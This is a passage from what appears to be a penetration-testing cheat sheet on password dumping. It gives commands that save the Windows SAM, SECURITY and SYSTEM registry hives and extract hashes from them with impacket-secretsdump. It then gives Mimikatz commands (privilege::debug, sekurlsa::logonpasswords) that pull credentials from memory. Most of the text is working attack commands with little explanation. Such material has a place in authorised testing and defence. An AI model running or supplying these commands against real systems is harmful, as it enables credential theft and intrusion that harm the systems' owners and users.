process of obtaining account login and password information, normally in the form of a hash or a clear text password.

Password Dumping

Manual

reg save hklm\sam c:\temp\sam.save
reg save hklm\security c:\temp\security.save
reg save hklm\system c:\temp\system.save

on our own host:

impacket-secretsdump -sam sam.save -security security.save -system system.save LoOCAL

Mimikatz

Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets.

Link: https://github.com/gentilkiwi/mimikatz

Quick usage

Ask for debug privilege for mimikatz process. (have to be done first)

privilege::debug

Clear screen

Cls

Exit mimikatz

Exit

Examples

Dump credentials:

privilege::debug  
sekurlsa::logonpasswords